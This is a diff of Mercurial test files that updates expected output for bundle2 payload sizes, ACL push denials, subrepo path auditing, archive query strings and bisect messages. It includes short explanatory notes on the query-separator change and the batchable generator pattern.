bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -617,14 +620,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -691,14 +694,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -764,7 +767,7 @@
list of changesets:
ef1ea85a6374b77d6da9dcda9541f498f2d17df7
bundle2-output-bundle: "HG20", 7 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:bookmarks" 37 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
@@ -773,7 +776,7 @@
bundle2-output-part: "bookmarks" 37 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:bookmarks" supported
bundle2-input-part: total payload size 37
bundle2-input-part: "check:phases" supported
@@ -853,7 +856,7 @@
list of changesets:
ef1ea85a6374b77d6da9dcda9541f498f2d17df7
bundle2-output-bundle: "HG20", 7 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:bookmarks" 37 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
@@ -862,7 +865,7 @@
bundle2-output-part: "bookmarks" 37 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:bookmarks" supported
bundle2-input-part: total payload size 37
bundle2-input-part: "check:phases" supported
@@ -897,6 +900,7 @@
bundle2-input-bundle: 7 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on bookmark "moving-bookmark" (changeset "ef1ea85a6374b77d6da9dcda9541f498f2d17df7")
no rollback information available
0:6675d58eff77
@@ -943,14 +947,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1029,14 +1033,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1069,6 +1073,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "wilma" not allowed on "quux/file.py" (changeset "911600dab2ae")
no rollback information available
0:6675d58eff77
@@ -1112,14 +1117,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1190,14 +1195,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1279,14 +1284,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1369,14 +1374,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1408,6 +1413,7 @@
bundle2-input-part: "phase-heads" supported
bundle2-input-part: total payload size 24
bundle2-input-bundle: 5 parts total
+ truncating cache/rbc-revs-v1 to 8
updating the branch cache
added 3 changesets with 3 changes to 3 files
bundle2-output-bundle: "HG20", 1 parts total
@@ -1455,14 +1461,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1493,6 +1499,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8")
no rollback information available
0:6675d58eff77
@@ -1537,14 +1544,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1624,14 +1631,14 @@
f9cafe1212c8c6fa1120d14a556e18cc44ff8bdd
911600dab2ae7a9baff75958b84fe606851ce955
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 24 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 24 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 24
bundle2-input-part: "check:updated-heads" supported
@@ -1664,6 +1671,7 @@
bundle2-input-bundle: 5 parts total
transaction abort!
rollback completed
+ truncating cache/rbc-revs-v1 to 8
abort: acl: user "fred" denied on "foo/Bar/file.txt" (changeset "f9cafe1212c8")
no rollback information available
0:6675d58eff77
@@ -1746,14 +1754,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1833,14 +1841,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1911,14 +1919,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -1985,14 +1993,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2053,14 +2061,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2145,14 +2153,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2236,14 +2244,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2309,14 +2317,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
@@ -2394,14 +2402,14 @@
911600dab2ae7a9baff75958b84fe606851ce955
e8fc755d4d8217ee5b0c2bb41558c40d43b92c01
bundle2-output-bundle: "HG20", 5 parts total
- bundle2-output-part: "replycaps" 224 bytes payload
+ bundle2-output-part: "replycaps" 207 bytes payload
bundle2-output-part: "check:phases" 48 bytes payload
bundle2-output-part: "check:updated-heads" streamed payload
bundle2-output-part: "changegroup" (params: 1 mandatory) streamed payload
bundle2-output-part: "phase-heads" 48 bytes payload
bundle2-input-bundle: with-transaction
bundle2-input-part: "replycaps" supported
- bundle2-input-part: total payload size 224
+ bundle2-input-part: total payload size 207
bundle2-input-part: "check:phases" supported
bundle2-input-part: total payload size 48
bundle2-input-part: "check:updated-heads" supported
--- a/tests/test-archive.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-archive.t Tue Apr 20 11:01:06 2021 -0400
@@ -334,10 +334,10 @@
> pass
> if len(sys.argv) <= 3:
> node, archive = sys.argv[1:]
- > requeststr = 'cmd=archive;node=%s;type=%s' % (node, archive)
+ > requeststr = 'cmd=archive&node=%s&type=%s' % (node, archive)
> else:
> node, archive, file = sys.argv[1:]
- > requeststr = 'cmd=archive;node=%s;type=%s;file=%s' % (node, archive, file)
+ > requeststr = 'cmd=archive&node=%s&type=%s&file=%s' % (node, archive, file)
> try:
> stdout = sys.stdout.buffer
> except AttributeError:
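
NOTE: the ';' -> '&' switch above tracks newer Python, whose urllib.parse
stopped honoring ';' as a query-string separator in recent security
releases (only '&' splits parameters by default). A minimal illustration,
separate from the patch itself:

    from urllib.parse import parse_qs

    # ';' is now kept as literal data instead of splitting parameters
    print(parse_qs('cmd=archive;node=x'))  # {'cmd': ['archive;node=x']}
    print(parse_qs('cmd=archive&node=x'))  # {'cmd': ['archive'], 'node': ['x']}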
--- a/tests/test-audit-subrepo.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-audit-subrepo.t Tue Apr 20 11:01:06 2021 -0400
@@ -323,7 +323,7 @@
new changesets 7a2f0e59146f
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ cat main5/.hg/hgrc | grep pwned
[1]
@@ -623,7 +623,7 @@
new changesets * (glob)
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ ls "$FAKEHOME"
a
$ test -d "$FAKEHOME/.hg"
@@ -652,7 +652,7 @@
new changesets * (glob)
.hgsubstate: untracked file differs
abort: untracked files in working directory differ from files in requested revision
- [255]
+ [20]
$ ls -A "$FAKEHOME"
.hg
a
--- a/tests/test-backout.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-backout.t Tue Apr 20 11:01:06 2021 -0400
@@ -718,6 +718,7 @@
ancestor path: foo (node f89532f44c247a0e993d63e3a734dd781ab04708)
other path: foo (node f50039b486d6fa1a90ae51778388cad161f425ee)
extra: ancestorlinknode = 91360952243723bd5b1138d5f26bd8c8564cb553
+ extra: merged = yes
$ mv .hg/merge/state2 .hg/merge/state2-moved
$ hg debugmergestate -v
no version 2 merge state
--- a/tests/test-batching.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-batching.py Tue Apr 20 11:01:06 2021 -0400
@@ -204,7 +204,7 @@
@wireprotov1peer.batchable
def foo(self, one, two=None):
- encargs = [
+ encoded_args = [
(
b'one',
mangle(one),
@@ -214,9 +214,9 @@
mangle(two),
),
]
- encresref = wireprotov1peer.future()
- yield encargs, encresref
- yield unmangle(encresref.value)
+ encoded_res_future = wireprotov1peer.future()
+ yield encoded_args, encoded_res_future
+ yield unmangle(encoded_res_future.value)
@wireprotov1peer.batchable
def bar(self, b, a):
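
NOTE: for readers skimming the renames above, a @batchable method is a
generator that yields exactly twice: first the wire-encoded arguments
together with an empty future, then the decoded result once the batcher
has filled that future in. Reassembled from this hunk (mangle, unmangle
and wireprotov1peer come from the test's own scaffolding):

    @wireprotov1peer.batchable
    def foo(self, one, two=None):
        encoded_args = [
            (b'one', mangle(one)),
            (b'two', mangle(two)),
        ]
        encoded_res_future = wireprotov1peer.future()
        # first yield: hand the encoded args and the future to the batcher
        yield encoded_args, encoded_res_future
        # second yield: the batched response has resolved the future
        yield unmangle(encoded_res_future.value)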
--- a/tests/test-bisect.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-bisect.t Tue Apr 20 11:01:06 2021 -0400
@@ -200,25 +200,25 @@
update: (current)
phases: 32 draft
$ hg bisect -g 1
- Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 tests)
+ Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests)
+ Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
skip
$ hg bisect -s
- Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests)
+ Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests)
+ Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests)
+ Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
- Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests)
+ Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first bad revision is:
@@ -234,7 +234,7 @@
$ hg bisect -b "0::3"
$ hg bisect -s "13::16"
$ hg bisect -g "26::tip"
- Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests)
+ Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cat .hg/bisect.state
bad b99c7b9c8e11558adef3fad9af211c58d46f325b
@@ -258,25 +258,25 @@
$ hg bisect -r
$ hg bisect -b null
$ hg bisect -g tip
- Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests)
+ Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
skip
$ hg bisect -s
- Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests)
+ Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
- Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests)
+ Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -b
- Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first good revision is:
@@ -295,7 +295,7 @@
$ hg bisect -r
$ hg bisect -g null
$ hg bisect -bU tip
- Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests)
$ hg id
5cd978ea5149
@@ -306,13 +306,13 @@
$ hg bisect -r
$ hg bisect -b 4
$ hg bisect -g 0
- Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests)
+ Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
Due to skipped revisions, the first bad revision could be any of:
@@ -343,7 +343,7 @@
$ hg bisect -r
$ hg bisect -g 0
$ hg bisect -b 2
- Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
Due to skipped revisions, the first bad revision could be any of:
@@ -372,19 +372,19 @@
$ hg bisect -r
$ hg bisect -b 6
$ hg bisect -g 0
- Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests)
+ Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 2:db07c04beaca (6 changesets remaining, ~2 tests)
+ Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests)
+ Testing changeset 4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests)
+ Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -s
- Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests)
+ Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests)
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg bisect -g
The first bad revision is:
@@ -473,17 +473,17 @@
$ hg bisect -r
$ hg up -qr tip
$ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters"
- changeset 31:58c80a7c8a40: good
+ changeset 31:58c80a7c8a40 tip "msg 31": good
abort: cannot bisect (no known bad revisions)
[20]
$ hg up -qr 0
$ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters"
- changeset 0:b99c7b9c8e11: bad
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 0:b99c7b9c8e11 "msg 0": bad
+ changeset 15:e7fa0811edb0 "msg 15": good
+ changeset 7:03750880c6b5 "msg 7": good
+ changeset 3:b53bea5e2fcb "msg 3": bad
+ changeset 5:7874a09ea728 "msg 5": bad
+ changeset 6:a3d5c6fdf0d3 "msg 6": good
The first good revision is:
changeset: 6:a3d5c6fdf0d3
user: test
@@ -510,13 +510,13 @@
$ hg bisect -r
$ hg bisect --good tip --noupdate
$ hg bisect --bad 0 --noupdate
- Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests)
+ Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests)
$ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate
- changeset 15:e7fa0811edb0: good
- changeset 7:03750880c6b5: good
- changeset 3:b53bea5e2fcb: bad
- changeset 5:7874a09ea728: bad
- changeset 6:a3d5c6fdf0d3: good
+ changeset 15:e7fa0811edb0 "msg 15": good
